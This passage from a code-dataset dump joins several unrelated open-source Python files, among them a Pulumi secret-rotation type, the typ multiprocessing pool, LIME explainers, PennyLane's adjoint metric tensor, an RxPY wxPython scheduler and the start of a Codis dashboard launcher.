def automatically_after_days(self) -> int:
"""
Specifies the number of days between automatic scheduled rotations of the secret.
"""
return pulumi.get(self, "automatically_after_days")
@pulumi.output_type
class SecretRotationRules(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "automaticallyAfterDays":
suggest = "automatically_after_days"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in SecretRotationRules. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
SecretRotationRules.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
SecretRotationRules.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
automatically_after_days: int):
"""
:param int automatically_after_days: Specifies the number of days between automatic scheduled rotations of the secret.
"""
pulumi.set(__self__, "automatically_after_days", automatically_after_days)
@property
@pulumi.getter(name="automaticallyAfterDays")
def automatically_after_days(self) -> int:
"""
Specifies the number of days between automatic scheduled rotations of the secret.
"""
return pulumi.get(self, "automatically_after_days")
@pulumi.output_type
class GetSecretRotationRotationRuleResult(dict):
def __init__(__self__, *,
automatically_after_days: int):
pulumi.set(__self__, "automatically_after_days", automatically_after_days)
@property
@pulumi.getter(name="automaticallyAfterDays")
def automatically_after_days(self) -> int:
return pulumi.get(self, "automatically_after_days")
@pulumi.output_type
class GetSecretRotationRuleResult(dict):
def __init__(__self__, *,
automatically_after_days: int):
pulumi.set(__self__, "automatically_after_days", automatically_after_days)
@property
@pulumi.getter(name="automaticallyAfterDays")
def automatically_after_days(self) -> int:
return pulumi.get(self, "automatically_after_days")
|
braintree/exceptions/http/connection_error.py
|
futureironman/braintree_python
| 182 |
85618
|
from braintree.exceptions.unexpected_error import UnexpectedError
class ConnectionError(UnexpectedError):
pass
|
third_party/typ/typ/pool.py
|
tingshao/catapult
| 2,151 |
85619
|
<filename>third_party/typ/typ/pool.py<gh_stars>1000+
# Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import multiprocessing
import pickle
import traceback
from typ.host import Host
def make_pool(host, jobs, callback, context, pre_fn, post_fn):
_validate_args(context, pre_fn, post_fn)
if jobs > 1:
return _ProcessPool(host, jobs, callback, context, pre_fn, post_fn)
else:
return _AsyncPool(host, jobs, callback, context, pre_fn, post_fn)
class _MessageType(object):
Request = 'Request'
Response = 'Response'
Close = 'Close'
Done = 'Done'
Error = 'Error'
Interrupt = 'Interrupt'
values = [Request, Response, Close, Done, Error, Interrupt]
def _validate_args(context, pre_fn, post_fn):
try:
_ = pickle.dumps(context)
except Exception as e:
raise ValueError('context passed to make_pool is not picklable: %s'
% str(e))
try:
_ = pickle.dumps(pre_fn)
except pickle.PickleError:
raise ValueError('pre_fn passed to make_pool is not picklable')
try:
_ = pickle.dumps(post_fn)
except pickle.PickleError:
raise ValueError('post_fn passed to make_pool is not picklable')
class _ProcessPool(object):
def __init__(self, host, jobs, callback, context, pre_fn, post_fn):
self.host = host
self.jobs = jobs
self.requests = multiprocessing.Queue()
self.responses = multiprocessing.Queue()
self.workers = []
self.discarded_responses = []
self.closed = False
self.erred = False
for worker_num in range(1, jobs + 1):
w = multiprocessing.Process(target=_loop,
args=(self.requests, self.responses,
host.for_mp(), worker_num,
callback, context,
pre_fn, post_fn))
w.start()
self.workers.append(w)
def send(self, msg):
self.requests.put((_MessageType.Request, msg))
def get(self):
msg_type, resp = self.responses.get()
if msg_type == _MessageType.Error:
self._handle_error(resp)
elif msg_type == _MessageType.Interrupt:
raise KeyboardInterrupt
assert msg_type == _MessageType.Response
return resp
def close(self):
for _ in self.workers:
self.requests.put((_MessageType.Close, None))
self.closed = True
def join(self):
# TODO: one would think that we could close self.requests in close(),
# above, and close self.responses below, but if we do, we get
# weird tracebacks in the daemon threads multiprocessing starts up.
# Instead, we have to hack the innards of multiprocessing. It
# seems likely that there's a bug somewhere, either in this module or
# in multiprocessing.
# pylint: disable=protected-access
if self.host.is_python3: # pragma: python3
multiprocessing.queues.is_exiting = lambda: True
else: # pragma: python2
multiprocessing.util._exiting = True
if not self.closed:
# We must be aborting; terminate the workers rather than
# shutting down cleanly.
for w in self.workers:
w.terminate()
w.join()
return []
final_responses = []
error = None
interrupted = None
for w in self.workers:
while True:
msg_type, resp = self.responses.get()
if msg_type == _MessageType.Error:
error = resp
break
if msg_type == _MessageType.Interrupt:
interrupted = True
break
if msg_type == _MessageType.Done:
final_responses.append(resp[1])
break
self.discarded_responses.append(resp)
for w in self.workers:
w.join()
# TODO: See comment above at the beginning of the function for
# why this is commented out.
# self.responses.close()
if error:
self._handle_error(error)
if interrupted:
raise KeyboardInterrupt
return final_responses
def _handle_error(self, msg):
worker_num, tb = msg
self.erred = True
raise Exception("Error from worker %d (traceback follows):\n%s" %
(worker_num, tb))
# 'Too many arguments' pylint: disable=R0913
def _loop(requests, responses, host, worker_num,
callback, context, pre_fn, post_fn, should_loop=True):
host = host or Host()
try:
context_after_pre = pre_fn(host, worker_num, context)
keep_looping = True
while keep_looping:
message_type, args = requests.get(block=True)
if message_type == _MessageType.Close:
responses.put((_MessageType.Done,
(worker_num, post_fn(context_after_pre))))
break
assert message_type == _MessageType.Request
resp = callback(context_after_pre, args)
responses.put((_MessageType.Response, resp))
keep_looping = should_loop
except KeyboardInterrupt as e:
responses.put((_MessageType.Interrupt, (worker_num, str(e))))
except Exception as e:
responses.put((_MessageType.Error,
(worker_num, traceback.format_exc())))
class _AsyncPool(object):
def __init__(self, host, jobs, callback, context, pre_fn, post_fn):
self.host = host or Host()
self.jobs = jobs
self.callback = callback
self.context = copy.deepcopy(context)
self.msgs = []
self.closed = False
self.post_fn = post_fn
self.context_after_pre = pre_fn(self.host, 1, self.context)
self.final_context = None
def send(self, msg):
self.msgs.append(msg)
def get(self):
return self.callback(self.context_after_pre, self.msgs.pop(0))
def close(self):
self.closed = True
self.final_context = self.post_fn(self.context_after_pre)
def join(self):
if not self.closed:
self.close()
return [self.final_context]
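# A minimal usage sketch for make_pool above. The callback, pre_fn and post_fn
# must be picklable module-level callables (as enforced by _validate_args);
# the example functions below are illustrative only.
def _example_pre(host, worker_num, context):
    return context
def _example_post(context):
    return context
def _example_callback(context, args):
    return args * 2
def _example_run():
    pool = make_pool(Host(), 1, _example_callback, {}, _example_pre, _example_post)
    pool.send(21)
    result = pool.get()  # 42, computed by _example_callback
    pool.close()
    pool.join()
    return result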
|
tensorflow_graphics/projects/points_to_3Dobjects/utils/image.py
|
Liang813/graphics
| 2,759 |
85633
|
<gh_stars>1000+
# Copyright 2020 The TensorFlow Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Image functions."""
# python3
from cvx2 import latest as cv2
import numpy as np
def get_affine_transform(center, scale, rot, output_size, inverse=False):
"""Affine transform."""
if not isinstance(scale, (np.ndarray, list)):
scale = np.array([scale, scale], dtype=np.float32)
dst_w, dst_h = output_size[0], output_size[1]
rot_rad = np.pi * rot / 180
src_dir = get_dir([0, scale[0] * -0.5], rot_rad)
dst_dir = np.array([0, dst_w * -0.5], np.float32)
src = np.zeros((3, 2), dtype=np.float32)
dst = np.zeros((3, 2), dtype=np.float32)
src[0, :], src[1, :] = center, center + src_dir
dst[0, :] = [dst_w * 0.5, dst_h * 0.5]
dst[1, :] = np.array([dst_w * 0.5, dst_h * 0.5], np.float32) + dst_dir
src[2:, :] = get_3rd_point(src[0, :], src[1, :])
dst[2:, :] = get_3rd_point(dst[0, :], dst[1, :])
if inverse:
transform = cv2.getAffineTransform(np.float32(dst), np.float32(src))
else:
transform = cv2.getAffineTransform(np.float32(src), np.float32(dst))
return transform
def get_3rd_point(point_1, point_2):
tmp_point = point_1 - point_2
return point_2 + np.array([-tmp_point[1], tmp_point[0]], dtype=np.float32)
def get_dir(point, rot_rad):
sin_rot, cos_rot = np.sin(rot_rad), np.cos(rot_rad)
result = [0, 0]
result[0] = point[0] * cos_rot - point[1] * sin_rot
result[1] = point[0] * sin_rot + point[1] * cos_rot
return np.array(result)
def transform_points(points, center, scale, output_size, inverse=False):
transform = get_affine_transform(
center, scale, 0, output_size, inverse=inverse)
new_points = np.concatenate([points, np.ones([points.shape[0], 1])], axis=1)
points_transformed = np.dot(transform, new_points.T).T
return points_transformed
def transform_predictions(points, center, scale, output_size):
return transform_points(points, center, scale, output_size, inverse=True)
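# A small usage sketch for the helpers above; the center, scale and output
# size are arbitrary example values.
def _example_transform():
    center = np.array([50.0, 50.0], dtype=np.float32)
    points = np.array([[50.0, 50.0], [60.0, 40.0]])
    # Map points from a 100x100 region centered at `center` into a 64x64 output.
    return transform_points(points, center, scale=100.0, output_size=(64, 64))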
|
explainers.py
|
marcotcr/lime-kdd
| 267 |
85643
|
from abc import ABCMeta, abstractmethod
import numpy as np
import scipy as sp
from sklearn import linear_model
import sklearn.metrics.pairwise
###############################
## Random Explainer
###############################
class RandomExplainer:
def __init__(self):
pass
def reset(self):
pass
def explain_instance(self,
instance_vector,
label,
classifier,
num_features,
dataset):
nonzero = instance_vector.nonzero()[1]
explanation = np.random.choice(nonzero, num_features)
return [(x, 1) for x in explanation]
def explain(self,
train_vectors,
train_labels,
classifier,
num_features,
dataset):
i = np.random.randint(0, train_vectors.shape[0])
explanation = self.explain_instance(train_vectors[i], None, None,
num_features, dataset)
return i, explanation
###############################
## Standalone Explainers
###############################
def most_important_word(classifier, v, class_):
# Returns the word w that moves P(Y) - P(Y|NOT w) the most for class Y.
max_index = 0
max_change = -1
orig = classifier.predict_proba(v)[0][class_]
for i in v.nonzero()[1]:
val = v[0,i]
v[0,i] = 0
pred = classifier.predict_proba(v)[0][class_]
change = orig - pred
if change > max_change:
max_change = change
max_index = i
v[0,i] = val
if max_change < 0:
return -1
return max_index
def explain_greedy(instance_vector,
label,
classifier,
num_features,
dataset=None):
explanation = []
z = instance_vector.copy()
while len(explanation) < num_features:
i = most_important_word(classifier, z, label)
if i == -1:
break
z[0,i] = 0
explanation.append(i)
return [(x, 1) for x in explanation]
def most_important_word_martens(predict_fn, v, class_):
# Returns the word w that moves P(Y) - P(Y|NOT w) the most for class Y.
max_index = 0
max_change = -1
orig = predict_fn(v)[0,class_]
for i in v.nonzero()[1]:
val = v[0,i]
v[0,i] = 0
pred = predict_fn(v)[0,class_]
change = orig - pred
if change > max_change:
max_change = change
max_index = i
v[0,i] = val
if max_change < 0:
return -1, max_change
return max_index, max_change
def explain_greedy_martens(instance_vector,
label,
predict_fn,
num_features,
dataset=None):
if not hasattr(predict_fn, '__call__'):
predict_fn = predict_fn.predict_proba
explanation = []
z = instance_vector.copy()
cur_score = predict_fn(instance_vector)[0, label]
while len(explanation) < num_features:
i, change = most_important_word_martens(predict_fn, z, label)
cur_score -= change
if i == -1:
break
explanation.append(i)
if cur_score < .5:
break
z[0,i] = 0
return [(x, 1) for x in explanation]
def data_labels_distances_mapping_text(x, classifier_fn, num_samples):
distance_fn = lambda x : sklearn.metrics.pairwise.cosine_distances(x[0],x)[0] * 100
features = x.nonzero()[1]
vals = np.array(x[x.nonzero()])[0]
doc_size = len(sp.sparse.find(x)[2])
sample = np.random.randint(1, doc_size, num_samples - 1)
data = np.zeros((num_samples, len(features)))
inverse_data = np.zeros((num_samples, len(features)))
data[0] = np.ones(doc_size)
inverse_data[0] = vals
features_range = range(len(features))
for i, s in enumerate(sample, start=1):
active = np.random.choice(features_range, s, replace=False)
data[i, active] = 1
for j in active:
inverse_data[i, j] = 1
sparse_inverse = sp.sparse.lil_matrix((inverse_data.shape[0], x.shape[1]))
sparse_inverse[:, features] = inverse_data
sparse_inverse = sp.sparse.csr_matrix(sparse_inverse)
mapping = features
labels = classifier_fn(sparse_inverse)
distances = distance_fn(sparse_inverse)
return data, labels, distances, mapping
# This is LIME
class GeneralizedLocalExplainer:
def __init__(self,
kernel_fn,
data_labels_distances_mapping_fn,
num_samples=5000,
lasso=True,
mean=None,
return_mean=False,
return_mapped=False,
lambda_=None,
verbose=True,
positive=False):
# Transform_classifier, transform_explainer,
# transform_explainer_to_classifier all take raw data in, whatever that is.
# perturb(x, num_samples) returns data (perturbed data in f'(x) form),
# inverse_data (perturbed data in x form) and mapping, where mapping is such
# that mapping[i] = j, where j is an index for x form.
# distance_fn takes raw data in. what we're calling raw data is just x
self.lambda_ = lambda_
self.kernel_fn = kernel_fn
self.data_labels_distances_mapping_fn = data_labels_distances_mapping_fn
self.num_samples = num_samples
self.lasso = lasso
self.mean = mean
self.return_mapped = return_mapped
self.return_mean = return_mean
self.verbose = verbose
self.positive = positive
def reset(self):
pass
def data_labels_distances_mapping(self, raw_data, classifier_fn):
data, labels, distances, mapping = self.data_labels_distances_mapping_fn(raw_data, classifier_fn, self.num_samples)
return data, labels, distances, mapping
def generate_lars_path(self, weighted_data, weighted_labels):
X = weighted_data
alphas, active, coefs = linear_model.lars_path(X, weighted_labels, method='lasso', verbose=False, positive=self.positive)
return alphas, coefs
def explain_instance_with_data(self, data, labels, distances, label, num_features):
weights = self.kernel_fn(distances)
weighted_data = data * weights[:, np.newaxis]
if self.mean is None:
mean = np.mean(labels[:, label])
else:
mean = self.mean
shifted_labels = labels[:, label] - mean
if self.verbose:
print('mean', mean)
weighted_labels = shifted_labels * weights
used_features = range(weighted_data.shape[1])
nonzero = used_features
alpha = 1
if self.lambda_:
classif = linear_model.Lasso(alpha=self.lambda_, fit_intercept=False, positive=self.positive)
classif.fit(weighted_data, weighted_labels)
used_features = classif.coef_.nonzero()[0]
if used_features.shape[0] == 0:
if self.return_mean:
return [], mean
else:
return []
elif self.lasso:
alphas, coefs = self.generate_lars_path(weighted_data, weighted_labels)
for i in range(len(coefs.T) - 1, 0, -1):
nonzero = coefs.T[i].nonzero()[0]
if len(nonzero) <= num_features:
chosen_coefs = coefs.T[i]
alpha = alphas[i]
break
used_features = nonzero
debiased_model = linear_model.Ridge(alpha=0, fit_intercept=False)
debiased_model.fit(weighted_data[:, used_features], weighted_labels)
if self.verbose:
print('Prediction_local', debiased_model.predict(data[0, used_features].reshape(1, -1)) + mean, 'Right:', labels[0, label])
if self.return_mean:
return sorted(zip(used_features,
debiased_model.coef_),
key=lambda x:np.abs(x[1]), reverse=True), mean
else:
return sorted(zip(used_features,
debiased_model.coef_),
key=lambda x:np.abs(x[1]), reverse=True)
def explain_instance(self,
raw_data,
label,
classifier_fn,
num_features, dataset=None):
if not hasattr(classifier_fn, '__call__'):
classifier_fn = classifier_fn.predict_proba
data, labels, distances, mapping = self.data_labels_distances_mapping(raw_data, classifier_fn)
if self.return_mapped:
if self.return_mean:
exp, mean = self.explain_instance_with_data(data, labels, distances, label, num_features)
else:
exp = self.explain_instance_with_data(data, labels, distances, label, num_features)
exp = [(mapping[x[0]], x[1]) for x in exp]
if self.return_mean:
return exp, mean
else:
return exp
return self.explain_instance_with_data(data, labels, distances, label, num_features), mapping
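# A minimal construction sketch for GeneralizedLocalExplainer above, pairing
# it with the text mapping function defined in this file and an exponential
# kernel. The kernel width of 25 and the unnamed classifier are placeholders.
def _example_explainer():
    kernel_width = 25.0
    kernel = lambda d: np.sqrt(np.exp(-(d ** 2) / kernel_width ** 2))
    return GeneralizedLocalExplainer(
        kernel, data_labels_distances_mapping_text,
        num_samples=5000, return_mapped=True, verbose=False)
# Calling explain_instance(instance_vector, label, classifier.predict_proba, 6)
# on the returned object yields up to six (feature, weight) pairs sorted by
# absolute weight.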
|
pennylane/transforms/adjoint_metric_tensor.py
|
therooler/pennylane
| 539 |
85652
|
# Copyright 2018-2021 Xanadu Quantum Technologies Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Contains the adjoint_metric_tensor.
"""
import warnings
from itertools import chain
from pennylane import numpy as np
import pennylane as qml
# pylint: disable=protected-access
from pennylane.transforms.metric_tensor import _contract_metric_tensor_with_cjac
def _apply_operations(state, op, device, invert=False):
"""Wrapper that allows to apply a variety of operations---or groups
of operations---to a state or to prepare a new state.
If ``invert=True``, this function makes sure not to alter the operations.
The state of the device, however may be altered, depending on the
device and performed operation(s).
"""
# pylint: disable=protected-access
if isinstance(op, (list, np.ndarray)):
if invert:
op = op[::-1]
for _op in op:
state = _apply_operations(state, _op, device, invert)
return state
if isinstance(op, qml.QubitStateVector):
if invert:
raise ValueError("Can't invert state preparation.")
device._apply_state_vector(op.parameters[0], op.wires)
return device._state
if isinstance(op, qml.BasisState):
if invert:
raise ValueError("Can't invert state preparation.")
device._apply_basis_state(op.parameters[0], op.wires)
return device._state
if invert:
op.inv()
state = device._apply_operation(state, op)
if invert:
op.inv()
return state
def _group_operations(tape):
"""Divide all operations of a tape into trainable operations and blocks
of untrainable operations after each trainable one."""
# Extract tape operations list
ops = tape.operations
# Find the indices of trainable operations in the tape operations list
trainables = np.where([qml.operation.is_trainable(op) for op in ops])[0]
# Add the indices incremented by one to the trainable indices
split_ids = list(chain.from_iterable([idx, idx + 1] for idx in trainables))
# Split at trainable and incremented indices to get groups after trainable
# operations and single trainable operations (in alternating order)
all_groups = np.split(ops, split_ids)
# Collect trainable operations and groups after trainable operations
# the first set of non-trainable ops are the ops "after the -1st" trainable op
group_after_trainable_op = dict(enumerate(all_groups[::2], start=-1))
trainable_operations = list(chain.from_iterable(all_groups[1::2]))
return trainable_operations, group_after_trainable_op
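# Editor's note (illustrative example, not part of the original file): for a tape
# whose operations are [A, T0, B, C, T1] with T0 and T1 trainable, np.where gives
# the trainable indices [1, 4], split_ids becomes [1, 2, 4, 5], and np.split
# yields [A], [T0], [B, C], [T1], []. Hence
#   trainable_operations     == [T0, T1]
#   group_after_trainable_op == {-1: [A], 0: [B, C], 1: []}
# where the key -1 holds the operations before the first trainable one.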
def adjoint_metric_tensor(circuit, device=None, hybrid=True):
r"""Implements the adjoint method outlined in
`Jones <https://arxiv.org/abs/2011.02991>`__ to compute the metric tensor.
A forward pass followed by intermediate partial backwards passes are
used to evaluate the metric tensor in :math:`\mathcal{O}(p^2)` operations,
where :math:`p` is the number of trainable operations, using 4 state
vectors.
.. note::
The adjoint metric tensor method has the following restrictions:
* Currently only ``"default.qubit"`` with ``shots=None`` is supported.
* We assume the circuit to be composed of unitary gates only and rely
on the ``generator`` property of the gates to be implemented.
Note also that this makes the metric tensor strictly real-valued.
Args:
circuit (.QuantumTape or .QNode): Circuit to compute the metric tensor of
device (.Device): Device to use for the adjoint method
hybrid (bool): Whether to take classical preprocessing into account. Ignored if
``circuit`` is a tape.
Returns:
array: the metric tensor of the tape with respect to its trainable parameters.
Dimensions are ``(tape.num_params, tape.num_params)``.
.. seealso:: :func:`~.metric_tensor` for hardware-compatible metric tensor computations.
**Example**
Consider the following QNode:
.. code-block:: python
dev = qml.device("default.qubit", wires=3)
@qml.qnode(dev, interface="autograd")
def circuit(weights):
qml.RX(weights[0], wires=0)
qml.RY(weights[1], wires=0)
qml.CNOT(wires=[0, 1])
qml.RZ(weights[2], wires=1)
qml.RZ(weights[3], wires=0)
return qml.expval(qml.PauliZ(0) @ qml.PauliZ(1)), qml.expval(qml.PauliY(1))
We can use the ``adjoint_metric_tensor`` transform to generate a new function
that returns the metric tensor of this QNode:
>>> mt_fn = qml.adjoint_metric_tensor(circuit)
>>> weights = np.array([0.1, 0.2, 0.4, 0.5], requires_grad=True)
>>> mt_fn(weights)
tensor([[ 0.25 , 0. , -0.0497, -0.0497],
[ 0. , 0.2475, 0.0243, 0.0243],
[-0.0497, 0.0243, 0.0123, 0.0123],
[-0.0497, 0.0243, 0.0123, 0.0123]], requires_grad=True)
This approach has the benefit of being significantly faster than the hardware-ready
``metric_tensor`` function:
>>> import time
>>> start_time = time.process_time()
>>> mt = mt_fn(weights)
>>> time.process_time() - start_time
0.019
>>> mt_fn_2 = qml.metric_tensor(circuit)
>>> start_time = time.process_time()
>>> mt = mt_fn_2(weights)
>>> time.process_time() - start_time
0.025
This speedup becomes more drastic for larger circuits.
The drawback of the adjoint method is that it is only available on simulators and without
shot simulations.
"""
if isinstance(circuit, qml.tape.QuantumTape):
return _adjoint_metric_tensor_tape(circuit, device)
if isinstance(circuit, (qml.QNode, qml.ExpvalCost)):
return _adjoint_metric_tensor_qnode(circuit, device, hybrid)
raise qml.QuantumFunctionError("The passed object is not a QuantumTape or QNode.")
def _adjoint_metric_tensor_tape(tape, device):
"""Computes the metric tensor of a tape using the adjoint method and a given device."""
# pylint: disable=protected-access
if device.shots is not None:
raise ValueError(
"The adjoint method for the metric tensor is only implemented for shots=None"
)
tape = qml.transforms.expand_trainable_multipar(tape)
# Divide all operations of a tape into trainable operations and blocks
# of untrainable operations after each trainable one.
trainable_operations, group_after_trainable_op = _group_operations(tape)
dim = 2**device.num_wires
# generate and extract initial state
psi = device._create_basis_state(0)
# initialize metric tensor components (which all will be real-valued)
like_real = qml.math.real(psi[0])
L = qml.math.convert_like(qml.math.zeros((tape.num_params, tape.num_params)), like_real)
T = qml.math.convert_like(qml.math.zeros((tape.num_params,)), like_real)
psi = _apply_operations(psi, group_after_trainable_op[-1], device)
for j, outer_op in enumerate(trainable_operations):
generator_1, prefactor_1 = qml.generator(outer_op)
generator_1 = qml.matrix(generator_1)
# the state vector phi is missing a factor of 1j * prefactor_1
phi = device._apply_unitary(
psi, qml.math.convert_like(generator_1, like_real), outer_op.wires
)
phi_real = qml.math.reshape(qml.math.real(phi), (dim,))
phi_imag = qml.math.reshape(qml.math.imag(phi), (dim,))
diag_value = prefactor_1**2 * (
qml.math.dot(phi_real, phi_real) + qml.math.dot(phi_imag, phi_imag)
)
L = qml.math.scatter_element_add(L, (j, j), diag_value)
lam = psi * 1.0
lam_real = qml.math.reshape(qml.math.real(lam), (dim,))
lam_imag = qml.math.reshape(qml.math.imag(lam), (dim,))
# this entry is missing a factor of 1j
value = prefactor_1 * (qml.math.dot(lam_real, phi_real) + qml.math.dot(lam_imag, phi_imag))
T = qml.math.scatter_element_add(T, (j,), value)
for i in range(j - 1, -1, -1):
# after first iteration of inner loop: apply U_{i+1}^\dagger
if i < j - 1:
phi = _apply_operations(phi, trainable_operations[i + 1], device, invert=True)
# apply V_{i}^\dagger
phi = _apply_operations(phi, group_after_trainable_op[i], device, invert=True)
lam = _apply_operations(lam, group_after_trainable_op[i], device, invert=True)
inner_op = trainable_operations[i]
# extract and apply G_i
generator_2, prefactor_2 = qml.generator(inner_op)
generator_2 = qml.matrix(generator_2)
# this state vector is missing a factor of 1j * prefactor_2
mu = device._apply_unitary(lam, qml.math.convert_like(generator_2, lam), inner_op.wires)
phi_real = qml.math.reshape(qml.math.real(phi), (dim,))
phi_imag = qml.math.reshape(qml.math.imag(phi), (dim,))
mu_real = qml.math.reshape(qml.math.real(mu), (dim,))
mu_imag = qml.math.reshape(qml.math.imag(mu), (dim,))
# this entry is missing a factor of 1j * (-1j) = 1, i.e. none
value = (
prefactor_1
* prefactor_2
* (qml.math.dot(mu_real, phi_real) + qml.math.dot(mu_imag, phi_imag))
)
L = qml.math.scatter_element_add(
L, [(i, j), (j, i)], value * qml.math.convert_like(qml.math.ones((2,)), value)
)
# apply U_i^\dagger
lam = _apply_operations(lam, inner_op, device, invert=True)
# apply U_j and V_j
psi = _apply_operations(psi, [outer_op, *group_after_trainable_op[j]], device)
# postprocessing: combine L and T into the metric tensor.
# We require outer(conj(T), T) here, but as we skipped the factor 1j above,
# the stored T is real-valued. Thus we have -1j*1j*outer(T, T) = outer(T, T)
metric_tensor = L - qml.math.tensordot(T, T, 0)
return metric_tensor
def _adjoint_metric_tensor_qnode(qnode, device, hybrid):
"""Computes the metric tensor of a qnode using the adjoint method and its device.
For ``hybrid==True`` this wrapper accounts for classical preprocessing within the
QNode.
"""
if device is None:
if isinstance(qnode, qml.ExpvalCost):
if qnode._multiple_devices: # pylint: disable=protected-access
warnings.warn(
"ExpvalCost was instantiated with multiple devices. Only the first device "
"will be used to evaluate the metric tensor with the adjoint method.",
UserWarning,
)
qnode = qnode.qnodes.qnodes[0]
device = qnode.device
cjac_fn = qml.transforms.classical_jacobian(
qnode, expand_fn=qml.transforms.expand_trainable_multipar
)
def wrapper(*args, **kwargs):
qnode.construct(args, kwargs)
mt = _adjoint_metric_tensor_tape(qnode.qtape, device)
if not hybrid:
return mt
cjac = cjac_fn(*args, **kwargs)
return _contract_metric_tensor_with_cjac(mt, cjac)
return wrapper
|
rx/concurrency/mainloopscheduler/wxscheduler.py
|
yutiansut/RxPY
| 733 |
85657
|
<gh_stars>100-1000
import logging
from rx.core import Disposable
from rx.disposables import SingleAssignmentDisposable, CompositeDisposable
from rx.concurrency.schedulerbase import SchedulerBase
log = logging.getLogger("Rx")
class WxScheduler(SchedulerBase):
"""A scheduler for a wxPython event loop."""
def __init__(self, wx):
self.wx = wx
self._timers = set()
class Timer(wx.Timer):
def __init__(self, callback):
super(Timer, self).__init__()
self.callback = callback
def Notify(self):
self.callback()
self._timer_class = Timer
def cancel_all(self):
"""Cancel all scheduled actions.
Should be called when destroying wx controls to prevent accessing
dead wx objects in actions that might be pending.
"""
for timer in self._timers:
timer.Stop()
def _wxtimer_schedule(self, time, action, state, periodic=False):
scheduler = self
msecs = self.to_relative(time)
disposable = SingleAssignmentDisposable()
periodic_state = [state]
def interval():
if periodic:
periodic_state[0] = action(periodic_state[0])
else:
disposable.disposable = action(scheduler, state)
log.debug("timeout: %s", msecs)
if msecs == 0:
msecs = 1 # wx.Timer doesn't support zero.
timer = self._timer_class(interval)
timer.Start(
msecs,
self.wx.TIMER_CONTINUOUS if periodic else self.wx.TIMER_ONE_SHOT
)
self._timers.add(timer)
def dispose():
timer.Stop()
self._timers.remove(timer)
return CompositeDisposable(disposable, Disposable.create(dispose))
def schedule(self, action, state=None):
"""Schedules an action to be executed."""
return self._wxtimer_schedule(0, action, state)
def schedule_relative(self, duetime, action, state=None):
"""Schedules an action to be executed after duetime.
Keyword arguments:
duetime -- {timedelta} Relative time after which to execute the action.
action -- {Function} Action to be executed.
Returns {Disposable} The disposable object used to cancel the scheduled
action (best effort)."""
return self._wxtimer_schedule(duetime, action, state)
def schedule_absolute(self, duetime, action, state=None):
"""Schedules an action to be executed at duetime.
Keyword arguments:
duetime -- {datetime} Absolute time after which to execute the action.
action -- {Function} Action to be executed.
Returns {Disposable} The disposable object used to cancel the scheduled
action (best effort)."""
duetime = self.to_datetime(duetime)
return self._wxtimer_schedule(duetime, action, state)
def schedule_periodic(self, period, action, state=None):
"""Schedules a periodic piece of work to be executed in the Qt
mainloop.
Keyword arguments:
period -- Period in milliseconds for running the work periodically.
action -- Action to be executed.
state -- [Optional] Initial state passed to the action upon the first
iteration.
Returns the disposable object used to cancel the scheduled recurring
action (best effort)."""
return self._wxtimer_schedule(period, action, state, periodic=True)
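# Editor's note: a minimal usage sketch, not part of the original module. It
# assumes wxPython is installed; the scheduler is handed the wx module so that
# its timers run on the application's main loop, and actions receive
# (scheduler, state) as per the docstrings above.
if __name__ == '__main__':
    from datetime import timedelta
    import wx
    app = wx.App(False)
    frame = wx.Frame(None, title="RxPY WxScheduler demo")
    scheduler = WxScheduler(wx)
    scheduler.schedule_relative(timedelta(seconds=1),
                                lambda sc, state: log.info("timer fired"))
    frame.Show()
    app.MainLoop()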
|
example/dashboard.py
|
hzhangse/codis
| 9,866 |
85698
|
<reponame>hzhangse/codis
#!/usr/bin/env python3
from utils import *
import atexit
import json
import datetime
class CodisDashboard(Process):
def __init__(self, admin_port, product_name, product_auth=None):
self.config = self._open_config(admin_port, product_name, product_auth)
self.admin_port = admin_port
self.product_name = product_name
self.product_auth = product_auth
self.logfile = "dashboard-{}.log".format(admin_port)
self.command = "codis-dashboard -c {}".format(self.config)
Process.__init__(self, self.command, self.logfile)
dict = {"admin_port": admin_port, "pid": self.proc.pid}
print(" >> codis.dashboard = " + json.dumps(dict, sort_keys=True))
@staticmethod
def _open_config(admin_port, product_name, product_auth=None):
config = 'dashboard-{}.toml'.format(admin_port)
with open(config, "w+") as f:
f.write('coordinator_name = "filesystem"\n')
f.write('coordinator_addr = "rootfs"\n')
f.write('product_name = "{}"\n'.format(product_name))
if product_auth is not None:
f.write('product_auth = "{}"\n'.format(product_auth))
f.write('admin_addr = ":{}"\n'.format(admin_port))
f.write('migration_method = "semi-async"\n')
f.write('migration_async_maxbulks = 200\n')
f.write('migration_async_maxbytes = "32mb"\n')
f.write('migration_async_numkeys = 100\n')
f.write('migration_timeout = "30s"\n')
f.write('sentinel_quorum = 2\n')
f.write('sentinel_parallel_syncs = 1\n')
f.write('sentinel_down_after = "5s"\n')
f.write('sentinel_failover_timeout = "10m"\n')
path = os.getcwd()
f.write('sentinel_notification_script = "{}"\n'.format(os.path.join(path, "sentinel_notify.sh")))
f.write('sentinel_client_reconfig_script = "{}"\n'.format(os.path.join(path, "sentinel_reconfig.sh")))
return config
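    # Editor's note (illustrative): for admin_port=18080 and product_name="demo-test",
    # the generated dashboard-18080.toml therefore begins with
    #   coordinator_name = "filesystem"
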